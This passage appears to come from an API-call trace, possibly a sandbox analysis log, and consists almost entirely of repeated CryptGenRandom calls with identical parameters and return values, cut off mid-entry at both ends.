dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.273] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.274] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.275] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.276] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: 